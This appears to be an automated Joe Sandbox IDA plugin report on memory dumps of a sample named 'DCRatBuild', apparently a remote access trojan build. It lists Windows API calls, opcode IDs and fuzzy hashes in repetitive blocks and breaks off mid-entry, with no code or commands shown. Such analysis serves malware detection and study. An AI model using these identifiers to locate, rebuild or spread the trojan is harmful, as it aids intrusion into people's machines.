                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FormatInfoLocaleNumber
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2169056816-0
                                                                                                                        • Opcode ID: 64ac774ec2a551ccc37aba45875822239b2708e68db3538b05dc5f8867838cb6
                                                                                                                        • Instruction ID: e3b2f73eb387b42ff2971f20792b6f9602b94e85543a8cea7c831b4117afdc46
                                                                                                                        • Opcode Fuzzy Hash: 64ac774ec2a551ccc37aba45875822239b2708e68db3538b05dc5f8867838cb6
                                                                                                                        • Instruction Fuzzy Hash: 12019A3A110348AED7109F61EC45F9A77B8FF09310F108432FA04AB191E374A928CBA9
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00496DDF,00000000,00000400), ref: 00496C74
                                                                                                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00496C95
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        • Opcode ID: 4535ba0a7a1d567732a1be353c84be28c7a204ae138d3d52fb481ab6e6e59d1f
                                                                                                                        • Instruction ID: 0a870a2a42a0215db0a570340df6b584ddfab269cdc5b994febb951a35024afa
                                                                                                                        • Opcode Fuzzy Hash: 4535ba0a7a1d567732a1be353c84be28c7a204ae138d3d52fb481ab6e6e59d1f
                                                                                                                        • Instruction Fuzzy Hash: E7D0C932344300BFFE510F628D06F6B7F99BF45B56F19C425B795E80E0CA789425A62D
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004C19EF,?,?,00000008,?,?,004C168F,00000000), ref: 004C1C21
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 9a34a5d23b5a595d628286b5877cda1c5343bcd2942041a95c0c00561a62ce61
                                                                                                                        • Instruction ID: 0fc9d923d41c6440e5ec80e3e12e575f2bacb17b785a8fd919f3a67a07e21d3a
                                                                                                                        • Opcode Fuzzy Hash: 9a34a5d23b5a595d628286b5877cda1c5343bcd2942041a95c0c00561a62ce61
                                                                                                                        • Instruction Fuzzy Hash: C5B14B392106089FD755CF28C486B657BE0FF06364F25865DE89ACF2A2D339ED92CB44
                                                                                                                        APIs
                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004AF66A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2325560087-0
                                                                                                                        • Opcode ID: 7eae7918120332fba8430237d289656b4045f0a1dc763eb5453cd35275866535
                                                                                                                        • Instruction ID: 69a50a29e5c177264ba1fa1fe17437093a7f0b046c710e48dccd8ec3c3a5ca00
                                                                                                                        • Opcode Fuzzy Hash: 7eae7918120332fba8430237d289656b4045f0a1dc763eb5453cd35275866535
                                                                                                                        • Instruction Fuzzy Hash: 9A51A0B5901619CFEB24CFD5E8857AABBF0FB59304F24843AC411EB360D379A904CB58
                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 0049B16B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Version
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1889659487-0
                                                                                                                        • Opcode ID: f22f540bc0f0d90fee35813926772e3849831261681d37881c491d9bbd1bd468
                                                                                                                        • Instruction ID: 50f339ae4ed780f272b98a02921cfb2c89946e39c0a893035efeaa3c5dde1bd3
                                                                                                                        • Opcode Fuzzy Hash: f22f540bc0f0d90fee35813926772e3849831261681d37881c491d9bbd1bd468
                                                                                                                        • Instruction Fuzzy Hash: 28F030B4E002189FDB18DB19FD92AD577F1F748355F1042B7D915937A0C374A980CEA9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: gj
                                                                                                                        • API String ID: 0-4203073231
                                                                                                                        • Opcode ID: 98ca81905aebf93b9add477c1f0418b2ea6fb5fc7b4609f9234565f1d369525d
                                                                                                                        • Instruction ID: cbc574451a30c1a3b7117596e628da4f77209db65d748ffea7586ae2fc0a8170
                                                                                                                        • Opcode Fuzzy Hash: 98ca81905aebf93b9add477c1f0418b2ea6fb5fc7b4609f9234565f1d369525d
                                                                                                                        • Instruction Fuzzy Hash: 23C14772A083418FC354CF29D880A5AFBE1BFC9708F19892EE998D7311D734E955CB96
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,004AF3A5), ref: 004AF9DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: db1ad81870788bc67fe668fa8cfd0c5a9562086d8d7d073d6a14a6f6431aea5c
                                                                                                                        • Instruction ID: 19c0219c32f73064c3083c1eca8e4500b42943a252d66efbf92efeba62ea5d61
                                                                                                                        • Opcode Fuzzy Hash: db1ad81870788bc67fe668fa8cfd0c5a9562086d8d7d073d6a14a6f6431aea5c
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: 626f2c2f750b45215ff14f12bce7fa2adeb7e63a803e1fd2134c121e27a06370
                                                                                                                        • Instruction ID: de8a42a602b2a279e0f0a6b767c118f1cc6792d63042c2b42dd987bbe6961e08
                                                                                                                        • Opcode Fuzzy Hash: 626f2c2f750b45215ff14f12bce7fa2adeb7e63a803e1fd2134c121e27a06370
                                                                                                                        • Instruction Fuzzy Hash: 87A011302022028FA3808F30AF08A0C3AA8AA00282308803AA008C0020EA2080A0AA08
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                        • Instruction ID: 6f9504d670f627ba25b7f5d7e8e351462aa8bd47b7b111a369f7b9d8a7023bc6
                                                                                                                        • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                        • Instruction Fuzzy Hash: B26209716047849FCB15CF28C5906BABBE1BFA6304F0D896ED8DA8B342D738E945CB15
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                        • Instruction ID: e0e2a440fa840d4f42260722bd2453c7072bca2dde926dd1b0494b6911e1926d
                                                                                                                        • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                        • Instruction Fuzzy Hash: 0662FA716083458FCB25DF28C9805BABBE1FFA6304F08856EE8968B346D734E945CB19
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                        • Instruction ID: 35e29da017634015501553d32f1125434b8014a195931414b9f3643b5bf71334
                                                                                                                        • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                        • Instruction Fuzzy Hash: 41523972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c542c97ae52408e9baf518c868708a9ae87ad9af97b6feaff701a72bf68abfa1
                                                                                                                        • Instruction ID: 2ef1e238300e2dc300ac59aae02c7a366113a1e2a1b2bccb1f3d8832cf6c9fc7
                                                                                                                        • Opcode Fuzzy Hash: c542c97ae52408e9baf518c868708a9ae87ad9af97b6feaff701a72bf68abfa1
                                                                                                                        • Instruction Fuzzy Hash: BA12D6B16087059FC728CF28C990A79B7E0FFA5308F14492EE996C7781D338E555CB49
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c326105ee1b3a824189b67e881d2ff89411e3b301f78164018d10eb1eab805a2
                                                                                                                        • Instruction ID: 5653ea65e3cfa2d94d3b80bde5ac8bb4d8c9b40f11ed087729c03a3bbf5373e2
                                                                                                                        • Opcode Fuzzy Hash: c326105ee1b3a824189b67e881d2ff89411e3b301f78164018d10eb1eab805a2
                                                                                                                        • Instruction Fuzzy Hash: 3AF19971A083018FCB18CF29C5C466ABFE5EBCA318F154A3FF48597352D638E9458B5A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3519838083-0
                                                                                                                        • Opcode ID: cd7b0f1e8b632ec909d4d993615d7e4c7390bcfa3250e759285db26b706eb608
                                                                                                                        • Instruction ID: efb58114514014a4da1f39bc344f576f67ba6fac1074391d06a232a1a46db203
                                                                                                                        • Opcode Fuzzy Hash: cd7b0f1e8b632ec909d4d993615d7e4c7390bcfa3250e759285db26b706eb608
                                                                                                                        • Instruction Fuzzy Hash: B4D1A6716083408FDB24CF29C94475BBBE1BF9A308F09456EF8859B342D778E905CB5A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 121ca63fcc093a0b36c69597a409a7a12f6969fcb6ef7f2eb2a314b421e13c9a
                                                                                                                        • Instruction ID: bd6c120c78ec09ec8e8f4f7f8841fb5532979e857c72d525fbf99f68331fd117
                                                                                                                        • Opcode Fuzzy Hash: 121ca63fcc093a0b36c69597a409a7a12f6969fcb6ef7f2eb2a314b421e13c9a
                                                                                                                        • Instruction Fuzzy Hash: B5E15B755093948FC704CF29D89046ABFF0AF9A300F46096FF9C497392C235EA19DB96
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                        • Instruction ID: bcabf6b2263d57eb4d4354880634a68981d486cea85a26264c0ff66c3cea0c9f
                                                                                                                        • Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
                                                                                                                        • Instruction Fuzzy Hash: 51917AB12003459BDB24EE64D894BFE77C4EBF2308F10092FF99687281DABC9546C35A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                        • Instruction ID: 883f6f1b1b3bbb02a5ca7b7d037fea14574d59bbfda882d83646c9cd10823df6
                                                                                                                        • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                        • Instruction Fuzzy Hash: 7B8130717043455BDF24DE69C891B7E37D4ABF7308F00493FE68687282DAEC8986875A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1660450033.0000000000491000.00000020.00000001.01000000.00000005.sdmp, Offset: 00490000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1660435111.0000000000490000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660493605.00000000004C3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004CE000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004D5000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660510083.00000000004F2000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                        • Associated: 00000001.00000002.1660555654.00000000004F3000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_490000_DCRatBuild.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4105a517bb5c634f90eef917f57e86dc481b81f3606ce27070afe67ee91dca73
                                                                                                                        • Instruction ID: d675eeffe267bf85441ca3643b303339bda014aa93792705ff35fc72fdb7f49c
